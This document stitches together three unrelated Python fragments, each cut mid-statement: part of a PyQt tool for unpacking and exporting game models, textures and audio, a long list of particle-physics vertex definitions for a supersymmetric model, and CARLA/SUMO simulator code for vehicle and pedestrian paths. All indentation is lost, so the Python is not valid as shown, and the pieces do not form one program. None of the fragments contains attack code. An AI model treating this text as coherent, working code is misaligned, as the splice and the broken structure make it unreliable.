if file[:23] == "sctextureconverter_log_" and file[-4:] == ".txt":
os.remove(os.path.dirname(tex_converter)+"\\"+file)
res = subprocess.call([dds_converter, tpath],
shell=False, stdout=subprocess.DEVNULL)
if res == 0:
if destination != (tpath+"texture."+ext):
shutil.copyfile(tpath+"texture."+ext, destination)
return res
else:
return 1
def convert_audio(source, destination):
if not os.path.isfile(source):
return -1
try:
with open(source, "rb") as f:
data = f.read()
is_resource = False
index = 0
while data:
fsb = fsb5.load(data)
ext = fsb.get_sample_extension()
data = data[fsb.raw_size:]
if not is_resource and data:
is_resource = True
for sample in fsb.samples:
try:
sample_data = fsb.rebuild_sample(sample)
except ValueError as e:
return -2
with open(destination+"."+ext, "wb") as f:
written = f.write(sample_data)
index += 1
except:
return -2
return 0
def update_viewport(cur_file, file_title):
global vpPixmap
ext = file_title.split(".")[-1]
if ext in types_3d:
widget.statusBar().showMessage(app.translate("3DModel", "3d model"))
res = convert_model(path+cur_file, tpath+"model.stl")
if res == 0:
vp3D.reload_model(tpath+"model.stl")
#widget.statusBar().showMessage("Done!")
vpLayout.setCurrentIndex(0)
elif res == -1:
widget.statusBar().showMessage(app.translate("FileNotFound",
"File not found"))
else:
widget.statusBar().showMessage(app.translate("CantConvert",
"Can't convert"))
if ext in types_tex:
widget.statusBar().showMessage(app.translate("Texture", "Texture"))
viewport.setPixmap(QPixmap())
res = convert_image(path+cur_file, tpath+"texture.png")
if res == 0:
vpPixmap = QPixmap(tpath+"texture.png")
vpImage.reset_view()
#widget.statusBar().showMessage("Done!")
vpLayout.setCurrentIndex(1)
elif res == -1:
widget.statusBar().showMessage(app.translate("FileNotFound",
"File not found"))
else:
widget.statusBar().showMessage(app.translate("CantConvert",
"Can't convert"))
if ext in types_audio:
widget.statusBar().showMessage(app.translate("Audio", "Audio"))
def change_item(item):
global cur_file
global file_name
global file_parent
global cur_hash
global cur_item
#if item == None or item == cur_item:
# return
cur_item = item
if item.childCount() == 1:
item = item.child(0)
#if item == cur_item:
# return
if item.childCount() == 0 and len(item.text(1)) == 16:
cur_hash = item.text(1)
cur_file = folder_tree.get(cur_hash+".bin", "")+\
"/"+cur_hash+".bin"
file_name = item.text(0)
file_parent = item.parent().text(0)
vpFilename.setText(cur_file+"\n"+file_parent+" : "+file_name)
update_viewport(cur_file, file_name)
tree.currentItemChanged.connect(change_item)
# Central layout
centre.setCollapsible(0, False)
centre.setCollapsible(1, False)
# Create file menu
file_menu = widget.menuBar().addMenu(app.translate("FileMenu", "File"))
# Add unpacking DEMD base
convertDEMDAction = QAction(app.translate("DEMDConvert", "Unpack game DB"),
widget)
convertDEMDAction.setStatusTip(app.translate("DEMDTip", "Unpack game archieves"))
widget.connect(convertDEMDAction, SIGNAL("triggered()"), convert_DEMD_base)
file_menu.addAction(convertDEMDAction)
# Add base opening
openAction = QAction(app.translate("BaseOpen", "Open unpacked DB"), widget)
openAction.setStatusTip(app.translate("OpenTip", "Open game files in program"))
openAction.setShortcut("Ctrl+O")
widget.connect(openAction, SIGNAL("triggered()"), open_base)
file_menu.addAction(openAction)
file_menu.addSeparator()
def file_export():
global file_name
global file_parent
global cur_hash
global last_dir
global last_filter
if file_name == "" or cur_hash == "":
return
ext = file_name.split(".")[-1]
if ext in types_3d:
if file_name == "ground.weightedprim":
name = file_parent.split(".")[0]
else:
name = file_name.split(".")[0]
save_name = QFileDialog.getSaveFileName(
caption=app.translate("Export3d", "Export model"),
dir = last_dir+"\\"+name, filter = save_filter[0],
selectedFilter = last_filter[0])
if save_name[0] == "":
return
last_dir = os.path.dirname(save_name[0])
last_filter[0] = save_name[1]
res = convert_model(path+cur_file,
save_name[0])
if res == 0:
widget.statusBar().showMessage(app.translate("Ready", "Ready"))
elif res == -1:
widget.statusBar().showMessage(app.translate("FileNotFound",
"File not found"))
else:
widget.statusBar().showMessage(app.translate("CantConvert",
"Can't convert"))
elif ext in types_tex:
if file_name == "default.tex":
name = file_parent.split(".")[0]
else:
name = file_name.split(".")[0]
save_name = QFileDialog.getSaveFileName(
caption=app.translate("ExportTex", "Export texture"),
dir = last_dir+"\\"+name, filter = save_filter[1],
selectedFilter = last_filter[1])
if save_name[0] == "":
return
last_dir = os.path.dirname(save_name[0])
last_filter[1] = save_name[1]
res = convert_image(path+cur_file, # cur_hash file_name
save_name[0])
if res == 0:
widget.statusBar().showMessage(app.translate("Ready", "Ready"))
elif res == -1:
widget.statusBar().showMessage(app.translate("FileNotFound",
"File not found"))
else:
widget.statusBar().showMessage(app.translate("CantConvert",
"Can't convert"))
elif ext in types_audio:
name = file_name
save_name = QFileDialog.getSaveFileName(
caption=app.translate("ExportAudio", "Export audio"),
dir = last_dir+"\\"+name)
if save_name[0] == "":
return
last_dir = os.path.dirname(save_name[0])
res = convert_audio(path+cur_file, save_name[0])
if res == 0:
widget.statusBar().showMessage(app.translate("Ready", "Ready"))
elif res == -1:
widget.statusBar().showMessage(app.translate("FileNotFound",
"File not found"))
else:
widget.statusBar().showMessage(app.translate("CantConvert",
"Can't convert"))
else:
try:
if not os.path.isfile(path+cur_file):
widget.statusBar().showMessage(app.translate("FileNotFound",
"File not found"))
return
name = file_name
save_name = QFileDialog.getSaveFileName(
caption=app.translate("ExportFile", "Export file"),
dir = last_dir+"\\"+name)
if save_name[0] == "":
return
last_dir = os.path.dirname(save_name[0])
shutil.copyfile(path+cur_file, save_name[0])
widget.statusBar().showMessage(app.translate("Ready", "Ready"))
except:
widget.statusBar().showMessage(app.translate("CantConvert",
"Can't convert"))
# Add export
exportAction = QAction(app.translate("MenuExport", "Export as..."), widget)
exportAction.setStatusTip(app.translate("ExportTip",
"Save file in common formats"))
exportAction.setShortcut("Ctrl+S")
widget.connect(exportAction, SIGNAL("triggered()"), file_export)
file_menu.addAction(exportAction)
def short_path(path, line_len=45):
if len(path) > line_len:
arr = path.split("\\")
if len(arr) > 3:
new_len = len(arr[0]) + len(arr[-1]) + 2
if new_len < line_len - 3:
new_arr = [arr[0], arr[-1]]
ind = 1
for i in range(len(arr)-2):
if i%2 != 0:
element = arr[i//2+1]
else:
element = arr[-2-i//2]
new_len += len(element) + 1
if new_len < line_len - 3:
new_arr.insert(ind, element)
if i&1: ind += 1
else:
break
new_arr.insert(ind, "...")
return "\\".join(new_arr)
return "...\\"+arr[-1]
return path
class PathButton(QPushButton):
def __init__(self, dialog_title="", is_folder=False, filter=""):
super(PathButton, self).__init__()
self.path = ""
self.is_folder = is_folder
self.dialog_title = dialog_title
self.clicked.connect(self.changePath)
self.filter = filter
def updatePath(self, path):
path = path.replace("/", "\\")
if self.is_folder and len(path) > 0 and path[-1] != "\\":
path += "\\"
if self.is_folder and os.path.isdir(path) or\
not self.is_folder and os.path.isfile(path):
self.setStyleSheet("background: rgb(150, 255, 150)")
else:
self.setStyleSheet("background: rgb(255, 150, 150)")
self.setToolTip(path)
self.setText(short_path(path))
self.path = path
def changePath(self):
if self.is_folder:
new_path = QFileDialog.getExistingDirectory(
caption=self.dialog_title, dir=self.path)
else:
new_path = QFileDialog.getOpenFileName(
caption=self.dialog_title,
dir=os.path.dirname(self.path),
filter=self.filter)[0]
if new_path == "":
return
else:
self.updatePath(new_path)
# Settings
settingsWindow = QWidget()
settingsWindow.resize(350,290)
settingsWindow.setWindowTitle(app.translate("SettingsTitle", "Settings"))
settingsTab1 = QWidget()
settingsTab1Layout = QFormLayout(parent=settingsTab1)
settingsLang = QComboBox(parent=settingsTab1)
settingsLang.addItems(langs)
settingsTab1Layout.addRow(app.translate("SettingsLang", "App language"),
settingsLang)
settingsBlender = PathButton(
dialog_title=app.translate("BlenderDialog", "Choose blender.exe"),
filter="Blender 3D (blender.exe)")
settingsTab1Layout.addRow(app.translate("SettingsBlender", "Blender path"),
settingsBlender)
settingsUnpack = PathButton(app.translate("UnpackerDialog",
"Choose Sir Kane's DEMDExtractor"))
settingsTab1Layout.addRow(app.translate("SettingsUnpack", "Archive unpacker"),
settingsUnpack)
settingsTex = PathButton(app.translate("TEX2DDSDialog",
"Choose Tex2Dds converter"))
settingsTab1Layout.addRow(app.translate("SettingsTex", "Tex2DDS converter"),
settingsTex)
settingsDds = PathButton(app.translate("DDSDialog",
"Choose dds to image converter"))
settingsTab1Layout.addRow(app.translate("SettingsDDS", "DDS image converter"),
settingsDds)
settingsTab2 = QWidget()
settingsTab2Layout = QFormLayout(parent=settingsTab2)
settingsPath = PathButton(app.translate("EPathDialog",
"Choose folder for fast export"),
True)
settingsTab2Layout.addRow(app.translate("SettingsPath", "Fast export savepath"),
settingsPath)
settingsImage = QComboBox(parent=settingsTab2)
settingsImage.addItems(save_ext_tex)
settingsTab2Layout.addRow(app.translate("SettingsImage", "Image format"),
settingsImage)
settingsModel = QComboBox(parent=settingsTab2)
settingsModel.addItems(save_ext_3d)
settingsTab2Layout.addRow(app.translate("SettingsModel", "Models format"),
settingsModel)
settingsTab = QTabWidget(parent=settingsWindow)
settingsTab.addTab(settingsTab1,
app.translate("SettingsTabCommon", "Common"))
settingsTab.addTab(settingsTab2,
app.translate("SettingsTabExport", "Fast export"))
def update_settings():
global path
global dds_converter
global tex_converter
global unpacker
global blender
global epath
global ext_textures
global ext_models
global lang_name
global last_dir
blender = settingsBlender.path
unpacker= settingsUnpack.path
tex_converter = settingsTex.path
dds_converter = settingsDds.path
epath = settingsPath.path
if lang_name != settingsLang.currentText():
lang_name = settingsLang.currentText()
warn = QMessageBox.information(
None, app.translate("LangChangeTip", "Language change"),
app.translate("LangChangeText",
"Restart app to enable selected language"))
ext_textures = settingsImage.currentText()
ext_models = settingsModel.currentText()
write_config()
settingsWindow.close()
def prepare_settings():
if lang_name in langs:
settingsLang.setCurrentIndex(langs.index(lang_name))
else:
settingsLang.setCurrentIndex(0)
settingsBlender.updatePath(blender)
settingsUnpack.updatePath(unpacker)
settingsTex.updatePath(tex_converter)
settingsDds.updatePath(dds_converter)
settingsPath.updatePath(epath)
if ext_textures in save_ext_tex:
settingsImage.setCurrentIndex(save_ext_tex.index(ext_textures))
else:
settingsImage.setCurrentIndex(0)
if ext_models in save_ext_3d:
settingsModel.setCurrentIndex(save_ext_3d.index(ext_models))
else:
settingsModel.setCurrentIndex(0)
settingsButtonLayout = QHBoxLayout()
settingsApply = QPushButton(app.translate("Save", "Save"),
parent=settingsWindow)
settingsApply.clicked.connect(update_settings)
settingsCancel = QPushButton(app.translate("Cancel", "Cancel"),
parent=settingsWindow)
settingsCancel.clicked.connect(settingsWindow.close)
settingsButtonLayout.addWidget(settingsApply)
settingsButtonLayout.addWidget(settingsCancel)
settingsLayout = QVBoxLayout(settingsWindow)
settingsLayout.addWidget(settingsTab, 1)
settingsLayout.addLayout(settingsButtonLayout)
def showSettings(tab=0):
prepare_settings()
settingsTab.setCurrentIndex(tab)
settingsWindow.show()
def configure_fast_export():
info = QMessageBox.information(
None, app.translate("FastExportSettingsTip",
"Need configure fast export"),
app.translate("FastExportSettingsText",
"Before using fast export, you need configure output folder and formats first"))
showSettings(1)
def fast_export():
global file_name
global file_parent
global cur_hash
global cur_file
if file_name == "" or cur_hash == "":
return
if ext_models == "" or ext_textures == "" or epath == "":
configure_fast_export()
return
if not os.path.isdir(epath):
try:
os.mkdir(epath)
except:
configure_fast_export()
return
if not os.path.isdir(epath):
configure_fast_export()
return
j = 1
ext = file_name.split(".")[-1]
if ext in types_3d:
if file_name == "ground.weightedprim":
name = file_parent.split(".")[0]
else:
name = file_name.split(".")[0]
sname = name + "." + ext_models
while os.path.isfile(epath+sname):
sname = name + "_" + str(j) + "." | |
],
color = [ 'Identity(1,2)' ],
lorentz = [ L.SSSS1 ],
couplings = {(0,0):C.GC_411})
V_519 = Vertex(name = 'V_519',
particles = [ P.sd3__tilde__, P.sd3, P.sl3__plus__, P.sl3__minus__ ],
color = [ 'Identity(1,2)' ],
lorentz = [ L.SSSS1 ],
couplings = {(0,0):C.GC_442})
V_520 = Vertex(name = 'V_520',
particles = [ P.sd3__tilde__, P.sd3, P.sl4__plus__, P.sl4__minus__ ],
color = [ 'Identity(1,2)' ],
lorentz = [ L.SSSS1 ],
couplings = {(0,0):C.GC_456})
V_521 = Vertex(name = 'V_521',
particles = [ P.sd3__tilde__, P.sd3, P.sl5__plus__, P.sl5__minus__ ],
color = [ 'Identity(1,2)' ],
lorentz = [ L.SSSS1 ],
couplings = {(0,0):C.GC_477})
V_522 = Vertex(name = 'V_522',
particles = [ P.sd3__tilde__, P.sd3, P.sl6__plus__, P.sl6__minus__ ],
color = [ 'Identity(1,2)' ],
lorentz = [ L.SSSS1 ],
couplings = {(0,0):C.GC_499})
V_523 = Vertex(name = 'V_523',
particles = [ P.sd1__tilde__, P.sd1, P.sd3__tilde__, P.sd3 ],
color = [ 'Identity(1,2)*Identity(3,4)', 'T(-1,2,1)*T(-1,4,3)' ],
lorentz = [ L.SSSS1 ],
couplings = {(0,0):C.GC_274,(1,0):C.GC_275})
V_524 = Vertex(name = 'V_524',
particles = [ P.sd2__tilde__, P.sd2, P.sd3__tilde__, P.sd3 ],
color = [ 'Identity(1,2)*Identity(3,4)', 'T(-1,2,1)*T(-1,4,3)' ],
lorentz = [ L.SSSS1 ],
couplings = {(0,0):C.GC_276,(1,0):C.GC_277})
V_525 = Vertex(name = 'V_525',
particles = [ P.sd3__tilde__, P.sd3__tilde__, P.sd3, P.sd3 ],
color = [ 'Identity(1,3)*Identity(2,4)', 'Identity(1,4)*Identity(2,3)', 'T(-1,3,1)*T(-1,4,2)', 'T(-1,3,2)*T(-1,4,1)' ],
lorentz = [ L.SSSS1 ],
couplings = {(1,0):C.GC_278,(0,0):C.GC_278,(3,0):C.GC_279,(2,0):C.GC_279})
V_526 = Vertex(name = 'V_526',
particles = [ P.n1, P.d, P.sd4__tilde__ ],
color = [ 'Identity(2,3)' ],
lorentz = [ L.FFS3 ],
couplings = {(0,0):C.GC_293})
V_527 = Vertex(name = 'V_527',
particles = [ P.n2, P.d, P.sd4__tilde__ ],
color = [ 'Identity(2,3)' ],
lorentz = [ L.FFS3 ],
couplings = {(0,0):C.GC_294})
V_528 = Vertex(name = 'V_528',
particles = [ P.n3, P.d, P.sd4__tilde__ ],
color = [ 'Identity(2,3)' ],
lorentz = [ L.FFS3 ],
couplings = {(0,0):C.GC_295})
V_529 = Vertex(name = 'V_529',
particles = [ P.n4, P.d, P.sd4__tilde__ ],
color = [ 'Identity(2,3)' ],
lorentz = [ L.FFS3 ],
couplings = {(0,0):C.GC_296})
V_530 = Vertex(name = 'V_530',
particles = [ P.a, P.sd4__tilde__, P.sd4 ],
color = [ 'Identity(2,3)' ],
lorentz = [ L.VSS2 ],
couplings = {(0,0):C.GC_281})
V_531 = Vertex(name = 'V_531',
particles = [ P.d__tilde__, P.n1, P.sd4 ],
color = [ 'Identity(1,3)' ],
lorentz = [ L.FFS4 ],
couplings = {(0,0):C.GC_50})
V_532 = Vertex(name = 'V_532',
particles = [ P.d__tilde__, P.n2, P.sd4 ],
color = [ 'Identity(1,3)' ],
lorentz = [ L.FFS4 ],
couplings = {(0,0):C.GC_51})
V_533 = Vertex(name = 'V_533',
particles = [ P.d__tilde__, P.n3, P.sd4 ],
color = [ 'Identity(1,3)' ],
lorentz = [ L.FFS4 ],
couplings = {(0,0):C.GC_52})
V_534 = Vertex(name = 'V_534',
particles = [ P.d__tilde__, P.n4, P.sd4 ],
color = [ 'Identity(1,3)' ],
lorentz = [ L.FFS4 ],
couplings = {(0,0):C.GC_53})
V_535 = Vertex(name = 'V_535',
particles = [ P.sd4__tilde__, P.sd4, P.sv1__tilde__, P.sv1 ],
color = [ 'Identity(1,2)' ],
lorentz = [ L.SSSS1 ],
couplings = {(0,0):C.GC_288})
V_536 = Vertex(name = 'V_536',
particles = [ P.sd4__tilde__, P.sd4, P.sv2__tilde__, P.sv2 ],
color = [ 'Identity(1,2)' ],
lorentz = [ L.SSSS1 ],
couplings = {(0,0):C.GC_288})
V_537 = Vertex(name = 'V_537',
particles = [ P.sd4__tilde__, P.sd4, P.sv3__tilde__, P.sv3 ],
color = [ 'Identity(1,2)' ],
lorentz = [ L.SSSS1 ],
couplings = {(0,0):C.GC_288})
V_538 = Vertex(name = 'V_538',
particles = [ P.a, P.a, P.sd4__tilde__, P.sd4 ],
color = [ 'Identity(3,4)' ],
lorentz = [ L.VVSS1 ],
couplings = {(0,0):C.GC_282})
V_539 = Vertex(name = 'V_539',
particles = [ P.h02, P.sd4__tilde__, P.sd4 ],
color = [ 'Identity(2,3)' ],
lorentz = [ L.SSS1 ],
couplings = {(0,0):C.GC_1855})
V_540 = Vertex(name = 'V_540',
particles = [ P.h01, P.sd4__tilde__, P.sd4 ],
color = [ 'Identity(2,3)' ],
lorentz = [ L.SSS1 ],
couplings = {(0,0):C.GC_1854})
V_541 = Vertex(name = 'V_541',
particles = [ P.h01, P.h01, P.sd4__tilde__, P.sd4 ],
color = [ 'Identity(3,4)' ],
lorentz = [ L.SSSS1 ],
couplings = {(0,0):C.GC_986})
V_542 = Vertex(name = 'V_542',
particles = [ P.h02, P.h02, P.sd4__tilde__, P.sd4 ],
color = [ 'Identity(3,4)' ],
lorentz = [ L.SSSS1 ],
couplings = {(0,0):C.GC_985})
V_543 = Vertex(name = 'V_543',
particles = [ P.A0, P.A0, P.sd4__tilde__, P.sd4 ],
color = [ 'Identity(3,4)' ],
lorentz = [ L.SSSS1 ],
couplings = {(0,0):C.GC_1080})
V_544 = Vertex(name = 'V_544',
particles = [ P.G0, P.G0, P.sd4__tilde__, P.sd4 ],
color = [ 'Identity(3,4)' ],
lorentz = [ L.SSSS1 ],
couplings = {(0,0):C.GC_1079})
V_545 = Vertex(name = 'V_545',
particles = [ P.G__minus__, P.G__plus__, P.sd4__tilde__, P.sd4 ],
color = [ 'Identity(3,4)' ],
lorentz = [ L.SSSS1 ],
couplings = {(0,0):C.GC_1079})
V_546 = Vertex(name = 'V_546',
particles = [ P.H__minus__, P.H__plus__, P.sd4__tilde__, P.sd4 ],
color = [ 'Identity(3,4)' ],
lorentz = [ L.SSSS1 ],
couplings = {(0,0):C.GC_1080})
V_547 = Vertex(name = 'V_547',
particles = [ P.sd4__tilde__, P.sd4, P.sl1__plus__, P.sl1__minus__ ],
color = [ 'Identity(1,2)' ],
lorentz = [ L.SSSS1 ],
couplings = {(0,0):C.GC_370})
V_548 = Vertex(name = 'V_548',
particles = [ P.sd4__tilde__, P.sd4, P.sl2__plus__, P.sl2__minus__ ],
color = [ 'Identity(1,2)' ],
lorentz = [ L.SSSS1 ],
couplings = {(0,0):C.GC_395})
V_549 = Vertex(name = 'V_549',
particles = [ P.sd4__tilde__, P.sd4, P.sl3__plus__, P.sl3__minus__ ],
color = [ 'Identity(1,2)' ],
lorentz = [ L.SSSS1 ],
couplings = {(0,0):C.GC_421})
V_550 = Vertex(name = 'V_550',
particles = [ P.sd4__tilde__, P.sd4, P.sl4__plus__, P.sl4__minus__ ],
color = [ 'Identity(1,2)' ],
lorentz = [ L.SSSS1 ],
couplings = {(0,0):C.GC_457})
V_551 = Vertex(name = 'V_551',
particles = [ P.sd4__tilde__, P.sd4, P.sl5__plus__, P.sl5__minus__ ],
color = [ 'Identity(1,2)' ],
lorentz = [ L.SSSS1 ],
couplings = {(0,0):C.GC_478})
V_552 = Vertex(name = 'V_552',
particles = [ P.sd4__tilde__, P.sd4, P.sl6__plus__, P.sl6__minus__ ],
color = [ 'Identity(1,2)' ],
lorentz = [ L.SSSS1 ],
couplings = {(0,0):C.GC_500})
V_553 = Vertex(name = 'V_553',
particles = [ P.sd1__tilde__, P.sd1, P.sd4__tilde__, P.sd4 ],
color = [ 'Identity(1,2)*Identity(3,4)', 'T(-1,2,1)*T(-1,4,3)' ],
lorentz = [ L.SSSS1 ],
couplings = {(0,0):C.GC_297,(1,0):C.GC_301})
V_554 = Vertex(name = 'V_554',
particles = [ P.sd2__tilde__, P.sd2, P.sd4__tilde__, P.sd4 ],
color = [ 'Identity(1,2)*Identity(3,4)', 'T(-1,2,1)*T(-1,4,3)' ],
lorentz = [ L.SSSS1 ],
couplings = {(0,0):C.GC_298,(1,0):C.GC_302})
V_555 = Vertex(name = 'V_555',
particles = [ P.sd3__tilde__, P.sd3, P.sd4__tilde__, P.sd4 ],
color = [ 'Identity(1,2)*Identity(3,4)', 'T(-1,2,1)*T(-1,4,3)' ],
lorentz = [ L.SSSS1 ],
couplings = {(0,0):C.GC_299,(1,0):C.GC_303})
V_556 = Vertex(name = 'V_556',
particles = [ P.sd4__tilde__, P.sd4__tilde__, P.sd4, P.sd4 ],
color = [ 'Identity(1,3)*Identity(2,4)', 'Identity(1,4)*Identity(2,3)', 'T(-1,3,1)*T(-1,4,2)', 'T(-1,3,2)*T(-1,4,1)' ],
lorentz = [ L.SSSS1 ],
couplings = {(1,0):C.GC_300,(0,0):C.GC_300,(3,0):C.GC_304,(2,0):C.GC_304})
V_557 = Vertex(name = 'V_557',
particles = [ P.n1, P.s, P.sd5__tilde__ ],
color = [ 'Identity(2,3)' ],
lorentz = [ L.FFS3 ],
couplings = {(0,0):C.GC_318})
V_558 = Vertex(name = 'V_558',
particles = [ P.n2, P.s, P.sd5__tilde__ ],
color = [ 'Identity(2,3)' ],
lorentz = [ L.FFS3 ],
couplings = {(0,0):C.GC_319})
V_559 = Vertex(name = 'V_559',
particles = [ P.n3, P.s, P.sd5__tilde__ ],
color = [ 'Identity(2,3)' ],
lorentz = [ L.FFS3 ],
couplings = {(0,0):C.GC_320})
V_560 = Vertex(name = 'V_560',
particles = [ P.n4, P.s, P.sd5__tilde__ ],
color = [ 'Identity(2,3)' ],
lorentz = [ L.FFS3 ],
couplings = {(0,0):C.GC_321})
V_561 = Vertex(name = 'V_561',
particles = [ P.a, P.sd5__tilde__, P.sd5 ],
color = [ 'Identity(2,3)' ],
lorentz = [ L.VSS2 ],
couplings = {(0,0):C.GC_306})
V_562 = Vertex(name = 'V_562',
particles = [ P.s__tilde__, P.n1, P.sd5 ],
color = [ 'Identity(1,3)' ],
lorentz = [ L.FFS4 ],
couplings = {(0,0):C.GC_54})
V_563 = Vertex(name = 'V_563',
particles = [ P.s__tilde__, P.n2, P.sd5 ],
color = [ 'Identity(1,3)' ],
lorentz = [ L.FFS4 ],
couplings = {(0,0):C.GC_55})
V_564 = Vertex(name = 'V_564',
particles = [ P.s__tilde__, P.n3, P.sd5 ],
color = [ 'Identity(1,3)' ],
lorentz = [ L.FFS4 ],
couplings = {(0,0):C.GC_56})
V_565 = Vertex(name = 'V_565',
particles = [ P.s__tilde__, P.n4, P.sd5 ],
color = [ 'Identity(1,3)' ],
lorentz = [ L.FFS4 ],
couplings = {(0,0):C.GC_57})
V_566 = Vertex(name = 'V_566',
particles = [ P.sd5__tilde__, P.sd5, P.sv1__tilde__, P.sv1 ],
color = [ 'Identity(1,2)' ],
lorentz = [ L.SSSS1 ],
couplings = {(0,0):C.GC_313})
V_567 = Vertex(name = 'V_567',
particles = [ P.sd5__tilde__, P.sd5, P.sv2__tilde__, P.sv2 ],
color = [ 'Identity(1,2)' ],
lorentz = [ L.SSSS1 ],
couplings = {(0,0):C.GC_313})
V_568 = Vertex(name = 'V_568',
particles = [ P.sd5__tilde__, P.sd5, P.sv3__tilde__, P.sv3 ],
color = [ 'Identity(1,2)' ],
lorentz = [ L.SSSS1 ],
couplings = {(0,0):C.GC_313})
V_569 = Vertex(name = 'V_569',
particles = [ P.a, P.a, P.sd5__tilde__, P.sd5 ],
color = [ 'Identity(3,4)' ],
lorentz = [ L.VVSS1 ],
couplings = {(0,0):C.GC_307})
V_570 | |
* forward_vec - half_y_len * sideward_vec]
return corners
def get_pedestrian_bounding_box_corners(actor):
bbox = actor.bounding_box
loc = carla.Vector2D(bbox.location.x, bbox.location.y) + get_position(actor)
forward_vec = get_forward_direction(actor).make_unit_vector()
sideward_vec = forward_vec.rotate(np.deg2rad(90))
# Hardcoded values for pedestrians.
half_y_len = 0.25
half_x_len = 0.25
corners = [loc - half_x_len * forward_vec + half_y_len * sideward_vec,
loc + half_x_len * forward_vec + half_y_len * sideward_vec,
loc + half_x_len * forward_vec - half_y_len * sideward_vec,
loc - half_x_len * forward_vec - half_y_len * sideward_vec]
return corners
def get_lane_constraints(sidewalk, position, forward_vec):
left_line_end = position + (1.5 + 2.0 + 0.8) * ((forward_vec.rotate(np.deg2rad(-90))).make_unit_vector())
right_line_end = position + (1.5 + 2.0 + 0.8) * ((forward_vec.rotate(np.deg2rad(90))).make_unit_vector())
left_lane_constrained_by_sidewalk = sidewalk.intersects(carla.Segment2D(position, left_line_end))
right_lane_constrained_by_sidewalk = sidewalk.intersects(carla.Segment2D(position, right_line_end))
return left_lane_constrained_by_sidewalk, right_lane_constrained_by_sidewalk
def is_car(actor):
return isinstance(actor, carla.Vehicle) and int(actor.attributes['number_of_wheels']) > 2
def is_bike(actor):
return isinstance(actor, carla.Vehicle) and int(actor.attributes['number_of_wheels']) == 2
def is_pedestrian(actor):
return isinstance(actor, carla.Walker)
class SumoNetworkAgentPath:
def __init__(self, route_points, min_points, interval):
self.route_points = route_points
self.min_points = min_points
self.interval = interval
@staticmethod
def rand_path(sumo_network, min_points, interval, segment_map, rng=random):
spawn_point = None
route_paths = None
while not spawn_point or len(route_paths) < 1:
spawn_point = segment_map.rand_point()
spawn_point = sumo_network.get_nearest_route_point(spawn_point)
route_paths = sumo_network.get_next_route_paths(spawn_point, min_points - 1, interval)
return SumoNetworkAgentPath(rng.choice(route_paths), min_points, interval)
def resize(self, sumo_network, rng=random):
while len(self.route_points) < self.min_points:
next_points = sumo_network.get_next_route_points(self.route_points[-1], self.interval)
if len(next_points) == 0:
return False
self.route_points.append(rng.choice(next_points))
return True
def get_min_offset(self, sumo_network, position):
min_offset = None
for i in range(int(len(self.route_points) / 2)):
route_point = self.route_points[i]
offset = position - sumo_network.get_route_point_position(route_point)
offset = offset.length()
if min_offset == None or offset < min_offset:
min_offset = offset
return min_offset
def cut(self, sumo_network, position):
cut_index = 0
min_offset = None
min_offset_index = None
for i in range(int(len(self.route_points) / 2)):
route_point = self.route_points[i]
offset = position - sumo_network.get_route_point_position(route_point)
offset = offset.length()
if min_offset == None or offset < min_offset:
min_offset = offset
min_offset_index = i
if offset <= 1.0:
cut_index = i + 1
# Invalid path because too far away.
if min_offset > 1.0:
self.route_points = self.route_points[min_offset_index:]
else:
self.route_points = self.route_points[cut_index:]
def get_position(self, sumo_network, index=0):
return sumo_network.get_route_point_position(self.route_points[index])
def get_yaw(self, sumo_network, index=0):
pos = sumo_network.get_route_point_position(self.route_points[index])
next_pos = sumo_network.get_route_point_position(self.route_points[index + 1])
return np.rad2deg(math.atan2(next_pos.y - pos.y, next_pos.x - pos.x))
class SidewalkAgentPath:
def __init__(self, route_points, route_orientations, min_points, interval):
self.min_points = min_points
self.interval = interval
self.route_points = route_points
self.route_orientations = route_orientations
@staticmethod
def rand_path(sidewalk, min_points, interval, cross_probability, segment_map, rng=None):
if rng is None:
rng = random
spawn_point = sidewalk.get_nearest_route_point(segment_map.rand_point())
path = SidewalkAgentPath([spawn_point], [rng.choice([True, False])], min_points, interval)
path.resize(sidewalk, cross_probability)
return path
def resize(self, sidewalk, cross_probability, rng=None):
if rng is None:
rng = random
while len(self.route_points) < self.min_points:
if rng.random() <= cross_probability:
adjacent_route_point = sidewalk.get_adjacent_route_point(self.route_points[-1], 50.0)
if adjacent_route_point is not None:
self.route_points.append(adjacent_route_point)
self.route_orientations.append(rng.randint(0, 1) == 1)
continue
if self.route_orientations[-1]:
self.route_points.append(
sidewalk.get_next_route_point(self.route_points[-1], self.interval))
self.route_orientations.append(True)
else:
self.route_points.append(
sidewalk.get_previous_route_point(self.route_points[-1], self.interval))
self.route_orientations.append(False)
return True
def cut(self, sidewalk, position):
cut_index = 0
min_offset = None
min_offset_index = None
for i in range(int(len(self.route_points) / 2)):
route_point = self.route_points[i]
offset = position - sidewalk.get_route_point_position(route_point)
offset = offset.length()
if min_offset is None or offset < min_offset:
min_offset = offset
min_offset_index = i
if offset <= 1.0:
cut_index = i + 1
# Invalid path because too far away.
if min_offset > 1.0:
self.route_points = self.route_points[min_offset_index:]
self.route_orientations = self.route_orientations[min_offset_index:]
else:
self.route_points = self.route_points[cut_index:]
self.route_orientations = self.route_orientations[cut_index:]
def get_position(self, sidewalk, index=0):
return sidewalk.get_route_point_position(self.route_points[index])
def get_yaw(self, sidewalk, index=0):
pos = sidewalk.get_route_point_position(self.route_points[index])
next_pos = sidewalk.get_route_point_position(self.route_points[index + 1])
return np.rad2deg(math.atan2(next_pos.y - pos.y, next_pos.x - pos.x))
class Agent(object):
def __init__(self, actor, type_tag, path, preferred_speed, steer_angle_range=0.0, rand=0):
self.actor = actor
self.type_tag = type_tag
self.path = path
self.preferred_speed = preferred_speed
self.stuck_time = None
self.control_velocity = carla.Vector2D(0, 0)
self.steer_angle_range = steer_angle_range
self.behavior_type = self.rand_agent_behavior_type(rand)
def rand_agent_behavior_type(self, prob):
prob_gamma_agent = 1.0
prob_simplified_gamma_agent = 0.0
prob_ttc_agent = 0.0
if prob <= prob_gamma_agent:
return carla.AgentBehaviorType.Gamma
elif prob <= prob_gamma_agent + prob_simplified_gamma_agent:
return carla.AgentBehaviorType.SimplifiedGamma
else:
return -1
class Context(object):
def __init__(self, args):
self.args = args
self.rng = random.Random(args.seed)
with (DATA_PATH/'{}.sim_bounds'.format(args.dataset)).open('r') as f:
self.bounds_min = carla.Vector2D(*[float(v) for v in f.readline().split(',')])
self.bounds_max = carla.Vector2D(*[float(v) for v in f.readline().split(',')])
self.bounds_occupancy = carla.OccupancyMap(self.bounds_min, self.bounds_max)
self.forbidden_bounds_min = None
self.forbidden_bounds_max = None
self.forbidden_bounds_occupancy = None
